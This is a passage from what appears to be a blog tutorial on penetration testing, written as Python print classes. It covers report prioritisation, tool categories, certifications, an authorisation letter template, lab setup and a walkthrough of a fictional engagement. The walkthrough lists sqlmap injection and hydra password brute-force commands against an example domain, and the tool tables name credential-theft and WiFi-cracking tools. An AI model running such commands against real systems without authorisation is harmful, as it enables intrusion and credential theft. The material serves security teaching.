ā ā¢ Examples: Information disclosure, best practice issues ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā Priority 5: INFORMATIONAL ā
ā ā¢ No immediate remediation required ā
ā ā¢ Business impact: None ā
ā ā¢ Examples: Recommendations, hardening opportunities ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
"""
print(prioritization)
reporting = PenTestReporting()
reporting.display()
reporting.create_finding_template()
reporting.remediation_prioritization()
6. Penetration Testing Tools
Essential Tool Categories
class PenTestTools:
"""Penetration testing tool categories"""
def __init__(self):
self.tool_categories = {
"Information Gathering": {
"Tools": [
"nmap - Network scanning",
"theHarvester - Email/Domain enumeration",
"Shodan - IoT/Device search",
"Maltego - OSINT analysis",
"Burp Suite - Web application proxy"
]
},
"Vulnerability Scanning": {
"Tools": [
"Nessus - Comprehensive scanner",
"OpenVAS - Open source scanner",
"Nuclei - Template-based scanner",
"Nikto - Web server scanner"
]
},
"Exploitation": {
"Tools": [
"Metasploit - Exploitation framework",
"SQLmap - SQL injection",
"Hydra - Password cracking",
"John the Ripper - Password cracking"
]
},
"Web Application": {
"Tools": [
"Burp Suite - Web proxy",
"OWASP ZAP - Web scanner",
"FFUF - Fuzzing tool",
"XSStrike - XSS scanner"
]
},
"Post-Exploitation": {
"Tools": [
"Mimikatz - Credential theft",
"Impacket - Network protocols",
"Cobalt Strike - Adversary simulation",
"PowerShell Empire - Post-exploitation"
]
},
"Wireless": {
"Tools": [
"Aircrack-ng - WiFi cracking",
"Kismet - Wireless detector",
"Reaver - WPS attack",
"Wifite - Automated wireless attacks"
]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TESTING TOOLS")
print("="*55)
for category, details in self.tool_categories.items():
print(f"\nš§ {category}")
for tool in details['Tools']:
print(f" ā¢ {tool}")
def kali_linux_tools(self):
"""Kali Linux tool categories"""
print("\n" + "="*55)
print("KALI LINUX TOOL CATEGORIES")
print("="*55)
kali_categories = """
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
ā 01 - Information Gathering ā
ā dnsrecon, theHarvester, recon-ng, maltego ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 02 - Vulnerability Analysis ā
ā nmap, nessus, openvas, nikto ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 03 - Web Application Analysis ā
ā burpsuite, owasp-zap, sqlmap, wpscan ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 04 - Database Assessment ā
ā sqlmap, sqlninja, sqlsus ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 05 - Password Attacks ā
ā hydra, john, crunch, hashcat ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 06 - Wireless Attacks ā
ā aircrack-ng, kismet, wifite, reaver ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 07 - Reverse Engineering ā
ā ghidra, radare2, apktool ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 08 - Exploitation Tools ā
ā metasploit, searchsploit, beef ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 09 - Sniffing & Spoofing ā
ā wireshark, tcpdump, bettercap, responder ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 10 - Post Exploitation ā
ā mimikatz, powersploit, empire ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 11 - Forensics ā
ā autopsy, foremost, volatility ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā¤
ā 12 - Social Engineering ā
ā setoolkit, evilginx2 ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
"""
print(kali_categories)
tools = PenTestTools()
tools.display()
tools.kali_linux_tools()
7. Certifications and Career Path
Penetration Testing Certifications
class PenTestCertifications:
"""Penetration testing certifications"""
def __init__(self):
self.certifications = {
"Entry Level": {
"Certifications": [
{
"name": "CompTIA Security+",
"focus": "General security fundamentals",
"prerequisites": "None",
"exam": "SY0-601"
},
{
"name": "CEH (Certified Ethical Hacker)",
"focus": "Ethical hacking concepts",
"prerequisites": "2 years security experience or EC-Council training",
"exam": "312-50"
}
]
},
"Intermediate": {
"Certifications": [
{
"name": "GPEN (GIAC Penetration Tester)",
"focus": "Practical penetration testing",
"prerequisites": "SANS SEC560 course",
"exam": "GIAC GPEN"
},
{
"name": "OSCP (Offensive Security Certified Professional)",
"focus": "Hands-on practical testing",
"prerequisites": "Penetration Testing with Kali Linux (PWK) course",
"exam": "24-hour practical exam"
},
{
"name": "PNPT (Practical Network Penetration Tester)",
"focus": "Real-world penetration testing",
"prerequisites": "PEH course",
"exam": "5-day practical exam"
}
]
},
"Advanced": {
"Certifications": [
{
"name": "OSEP (Offensive Security Experienced Penetration Tester)",
"focus": "Advanced evasion techniques",
"prerequisites": "OSCP",
"exam": "48-hour practical exam"
},
{
"name": "OSWE (Offensive Security Web Expert)",
"focus": "Web application security",
"prerequisites": "OSCP recommended",
"exam": "48-hour practical exam"
},
{
"name": "CISSP",
"focus": "Security management",
"prerequisites": "5 years security experience",
"exam": "CISSP"
}
]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TESTING CERTIFICATIONS")
print("="*55)
for level, certs in self.certifications.items():
print(f"\nš {level.upper()}")
for cert in certs['Certifications']:
print(f"\n {cert['name']}")
print(f" Focus: {cert['focus']}")
print(f" Prerequisites: {cert['prerequisites']}")
print(f" Exam: {cert['exam']}")
def certification_path(self):
"""Recommended certification path"""
print("\n" + "="*55)
print("RECOMMENDED CERTIFICATION PATH")
print("="*55)
path = """
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
ā CAREER PATH ā
ā ā
ā Security+ (Foundation) ā
ā ā ā
ā ā¼ ā
ā CEH / eJPT (Concepts) ā
ā ā ā
ā ā¼ ā
ā OSCP / PNPT (Practical) ā
ā ā ā
ā ā¼ ā
ā OSEP / OSWE (Advanced) ā
ā ā ā
ā ā¼ ā
ā CISSP / CREST (Management) ā
ā ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
Suggested Timeline:
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
ā Year 1: Security+ ā CEH/eJPT ā
ā Year 2-3: OSCP ā Practical experience ā
ā Year 4: OSEP/OSWE (specialization) ā
ā Year 5+: CISSP (management path) ā
āāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāāā
"""
print(path)
certs = PenTestCertifications()
certs.display()
certs.certification_path()
8. Legal and Ethical Considerations
class LegalEthical:
"""Legal and ethical aspects of penetration testing"""
def __init__(self):
self.principles = {
"Legal Authorization": {
"Requirements": [
"Signed written authorization",
"Clearly defined scope",
"Third-party consent (cloud providers, hosting)",
"Data handling agreements",
"Insurance coverage"
],
"Risks": "Testing without authorization = illegal (CFAA, Computer Misuse Act)"
},
"Professional Ethics": {
"Principles": [
"Do no harm",
"Respect confidentiality",
"Maintain integrity",
"Report findings honestly",
"Protect client data"
],
"Codes": ["EC-Council Code of Ethics", "ISC2 Code of Ethics"]
},
"Scope Limitations": {
"Restrictions": [
"Out-of-scope systems",
"Prohibited techniques",
"Testing windows",
"Data exfiltration limits",
"Denial of service restrictions"
]
},
"Data Handling": {
"Practices": [
"Encrypt sensitive findings",
"Secure transmission",
"Limited retention period",
"Secure destruction",
"Chain of custody for evidence"
]
}
}
def display(self):
print("\n" + "="*55)
print("LEGAL AND ETHICAL CONSIDERATIONS")
print("="*55)
for principle, details in self.principles.items():
print(f"\nāļø {principle}")
if 'Requirements' in details:
print("\nRequirements:")
for req in details['Requirements']:
print(f" ā¢ {req}")
if 'Principles' in details:
print("\nPrinciples:")
for princ in details['Principles']:
print(f" ā¢ {princ}")
if 'Risks' in details:
print(f"\nRisk: {details['Risks']}")
def authorization_letter_template(self):
"""Sample authorization letter template"""
print("\n" + "="*55)
print("AUTHORIZATION LETTER TEMPLATE")
print("="*55)
template = """
AUTHORIZATION FOR PENETRATION TESTING
======================================
Date: _____________
TO: [Testing Company]
FROM: [Client Organization]
This letter serves as formal authorization for [Testing Company] to perform
penetration testing on the systems specified below.
SCOPE OF TESTING:
-----------------
* IP Ranges: _____________
* Domains: _____________
* Applications: _____________
* Network Segments: _____________
AUTHORIZED TESTING TYPES:
------------------------
[ ] External Network Testing
[ ] Internal Network Testing
[ ] Web Application Testing
[ ] API Testing
[ ] Social Engineering
[ ] Physical Security Testing
TESTING PERIOD:
--------------
Start Date: _____________
End Date: _____________
RESTRICTIONS:
------------
* [ ] Denial of Service testing NOT authorized
* [ ] Social engineering NOT authorized
* [ ] Physical testing NOT authorized
* [ ] Production systems NOT authorized
* [ ] Data exfiltration NOT authorized
AUTHORIZED BY:
-------------
Name: _____________
Title: _____________
Signature: _____________
Date: _____________
EMERGENCY CONTACT:
-----------------
Name: _____________
Phone: _____________
Email: _____________
"""
print(template)
legal = LegalEthical()
legal.display()
legal.authorization_letter_template()
9. Building a Penetration Testing Lab
Lab Environment Setup
class PenTestLab:
"""Building a penetration testing lab"""
def __init__(self):
self.lab_components = {
"Attacker Machine": {
"OS": "Kali Linux / Parrot OS",
"Requirements": [
"8GB+ RAM",
"50GB+ storage",
"Virtualization support"
],
"Tools": "Full suite of penetration testing tools"
},
"Target Systems": {
"Vulnerable VMs": [
"Metasploitable 2/3",
"DVWA (Damn Vulnerable Web Application)",
"OWASP WebGoat",
"OWASP Juice Shop",
"VulnHub machines",
"HackTheBox machines"
],
"Purpose": "Practice exploitation techniques"
},
"Network Infrastructure": {
"Components": [
"pfSense/OPNsense firewall",
"Windows Domain Controller",
"Active Directory environment",
"Network switches (virtual)",
"IDS/IPS (Snort/Suricata)"
],
"Purpose": "Realistic network simulation"
},
"Cloud Lab": {
"Options": [
"AWS security lab",
"Azure training environment",
"GCP security playground"
],
"Tools": ["AWS CLI", "Prowler", "ScoutSuite"]
}
}
def display(self):
print("\n" + "="*55)
print("PENETRATION TESTING LAB SETUP")
print("="*55)
for component, details in self.lab_components.items():
print(f"\nš» {component}")
if 'OS' in details:
print(f"OS: {details['OS']}")
if 'Requirements' in details:
print("Requirements:")
for req in details['Requirements']:
print(f" ā¢ {req}")
print("Components:")
for item in details.get('Vulnerable VMs', details.get('Components', details.get('Options', []))):
print(f" ā¢ {item}")
def vulnerable_machines(self):
"""List of vulnerable machines for practice"""
print("\n" + "="*55)
print("VULNERABLE MACHINES FOR PRACTICE")
print("="*55)
machines = """
BEGINNER:
ā¢ Metasploitable 2 - Purpose-built vulnerable Linux
ā¢ DVWA (Damn Vulnerable Web Application) - Web app training
ā¢ OWASP WebGoat - Web security training
INTERMEDIATE:
ā¢ VulnHub Kioptrix - Multiple levels
ā¢ VulnHub Mr-Robot - Realistic scenario
ā¢ HackTheBox - Challenge-based platform
ā¢ TryHackMe - Guided learning paths
ADVANCED:
ā¢ HackTheBox Pro Labs - Simulated enterprise environments
ā¢ Offensive Security Labs - OSCP training
ā¢ HackTheBox Offshore - Advanced AD environment
ā¢ PentesterLab Pro - Web-focused challenges
ACTIVE DIRECTORY:
ā¢ HackTheBox Forest
ā¢ HackTheBox Sauna
ā¢ VulnHub RastaLab
ā¢ Lab of the VMs (LOTV)
WEB APPLICATION:
ā¢ OWASP Juice Shop
ā¢ PortSwigger Web Security Academy
ā¢ PentesterLab Web for Pentester
ā¢ HackTheBox web challenges
"""
print(machines)
lab = PenTestLab()
lab.display()
lab.vulnerable_machines()
10. Practical Penetration Testing Scenario
End-to-End Testing Walkthrough
class PenTestScenario:
"""End-to-end penetration testing scenario"""
def __init__(self):
self.scenario = {
"Scenario": "Acme Corp External Network Penetration Test",
"Objective": "Identify vulnerabilities in external-facing assets",
"Scope": "acmecorp.com, 203.0.113.0/24",
"Rules": "No DoS, no social engineering"
}
def run_scenario(self):
"""Walk through a penetration test scenario"""
print("\n" + "="*55)
print("PENETRATION TEST SCENARIO: Acme Corp")
print("="*55)
phases = {
"Phase 1: Reconnaissance": {
"Commands": [
"whois acmecorp.com",
"nslookup -type=MX acmecorp.com",
"dig acmecorp.com ANY",
"theHarvester -d acmecorp.com -b google",
"nmap -sS -sV -p- -T4 acmecorp.com"
],
"Findings": [
"Open ports: 80 (HTTP), 443 (HTTPS), 22 (SSH)",
"Web server: Apache 2.4.41",
"SSL/TLS: TLS 1.2 with weak ciphers",
"Subdomains: mail.acmecorp.com, dev.acmecorp.com"
]
},
"Phase 2: Vulnerability Analysis": {
"Commands": [
"nikto -h https://acmecorp.com",
"nmap --script vuln acmecorp.com",
"sslscan acmecorp.com:443",
"gobuster dir -u https://acmecorp.com -w /usr/share/wordlists/dirb/common.txt"
],
"Findings": [
"Directory listing enabled on /backup",
"SSL/TLS: POODLE vulnerability",
"Apache version outdated (CVE-2020-9490)",
"Robots.txt reveals admin directory"
]
},
"Phase 3: Exploitation": {
"Activities": [
"Exploit SSL/TLS vulnerability",
"Enumerate backup directory",
"Test admin panel for default credentials",
"SQL injection on contact form"
],
"Commands": [
"sqlmap -u 'https://acmecorp.com/contact?id=1' --dbs",
"hydra -l admin -P /usr/share/wordlists/rockyou.txt acmecorp.com https-post-form"
]
},
"Phase 4: Post-Exploitation": {
"Findings": [
"Admin panel accessible with default credentials (admin:admin)",
"File upload vulnerability leads to RCE",
"Database contains customer PII",
"Internal network access possible via pivot"
]
},
"Phase 5: Reporting": {
"Critical Findings": [
"Default admin credentials - Immediate remediation",
"File upload RCE - Patch required",
"Customer data exposure - Security incident",
"Weak SSL/TLS - Configuration update"
],
"Recommendations": [
"Implement strong password policy",
"Disable directory listing",
"Update Apache to latest version",
"Implement WAF",
"Regular vulnerability scanning"
]
}
}
for phase, details in phases.items():
print(f"\n{'='*55}")
print(f"{phase}")
print("="*55)
if 'Commands' in details:
print("\nCommands Executed:")
for cmd in details['Commands']:
print(f" $ {cmd}")
if 'Findings' in details:
print("\nFindings:")
for finding in details['Findings']:
print(f" ā¢ {finding}")
if 'Activities' in details:
print("\nActivities:")
for activity in details['Activities']:
print(f" ā¢ {activity}")
if 'Critical Findings' in details:
print("\nCritical Findings:")
for finding in details['Critical Findings']:
print(f" ā ļø {finding}")
if 'Recommendations' in details:
print("\nRecommendations:")
for rec in details['Recommendations']:
print(f" ā {rec}")
scenario = PenTestScenario()
scenario.run_scenario()
Conclusion
Penetration testing is a critical component of any organization's security program. This comprehensive guide has covered:
Key Takeaways
- Methodology: Follow structured approaches (PTES, OWASP, NIST)
- Phases: Pre-engagement, Reconnaissance, Vulnerability Analysis, Exploitation, Post-Exploitation, Reporting
- Tools: Diverse toolset for different testing scenarios
- Legal: Always obtain written authorization
- Ethics: Maintain professional standards and confidentiality
- Reporting: Clear, actionable findings with remediation guidance
- Continuous Learning: Stay current with new techniques and vulnerabilities
def final_summary():
"""Final summary and recommendations"""
print("\n" + "="*55)
print("PENETRATION TESTING: KEY PRINCIPLES")
print("="*55)
principles = [
"ā Always obtain written authorization before testing",
"ā Define clear scope and rules of engagement",
"ā Follow a structured methodology",
"ā Document everything for reporting",
"ā Prioritize findings based on risk",
"ā Provide actionable remediation guidance",
"ā Protect client data and maintain confidentiality",
"ā Continuously learn and update skills",
"ā Never stop testing assumptions",
"ā Think like an attacker, act like a professional"
]
for principle in principles:
print(principle)
print("\n" + "="*55)
print("THE PENETRATION TESTER'S MINDSET")
print("="*55)
print("""
"The goal is not just to break things,
but to help build more secure systems.
Every vulnerability discovered is an opportunity
to improve security posture."
""")
print("="*55)
final_summary()
Penetration testing is both an art and a science. It requires technical expertise, creativity, and a deep understanding of attacker methodologies. By following established methodologies, maintaining ethical standards, and continuously improving skills, penetration testers play a vital role in strengthening organizational security.
Java Logistics, Shipping Integration & Enterprise Inventory Automation (Tracking, ERP, RFID & Billing Systems)
https://macronepal.com/blog/aftership-tracking-in-java-enterprise-package-visibility/
Explains how to integrate AfterShip tracking services into Java applications to provide real-time shipment visibility, delivery status updates, and centralized tracking across multiple courier services.
https://macronepal.com/blog/shipping-integration-using-fedex-api-with-java-for-logistics-automation/
Explains how to integrate the FedEx API into Java systems to automate shipping tasks such as creating shipments, calculating delivery costs, generating shipping labels, and tracking packages.
https://macronepal.com/blog/shipping-and-logistics-integrating-ups-apis-with-java-applications/
Explains UPS API integration in Java to enable automated shipping operations including rate calculation, shipment scheduling, tracking, and delivery confirmation management.
https://macronepal.com/blog/generating-and-reading-qr-codes-for-products-in-java/
Explains how Java applications generate and read QR codes for product identification, tracking, and authentication, supporting faster inventory handling and product verification processes.
https://macronepal.com/blog/designing-a-robust-pick-and-pack-workflow-in-java/
Explains how to design an efficient pick-and-pack workflow in Java warehouse systems, covering order processing, item selection, packaging steps, and logistics preparation to improve fulfillment efficiency.
https://macronepal.com/blog/rfid-inventory-management-system-in-java-a-complete-guide/
Explains how RFID technology integrates with Java applications to automate inventory tracking, reduce manual errors, and enable real-time stock monitoring in warehouses and retail environments.
https://macronepal.com/blog/erp-integration-with-odoo-in-java/
Explains how Java applications connect with Odoo ERP systems to synchronize inventory, orders, customer records, and financial data across enterprise systems.
https://macronepal.com/blog/automated-invoice-generation-creating-professional-excel-invoices-with-apache-poi-in-java/
Explains how to automatically generate professional Excel invoices in Java using Apache POI, enabling structured billing documents and automated financial record creation.
https://macronepal.com/blog/enterprise-financial-integration-using-quickbooks-api-in-java-applications/
Explains QuickBooks API integration in Java to automate financial workflows such as invoice management, payment tracking, accounting synchronization, and financial reporting.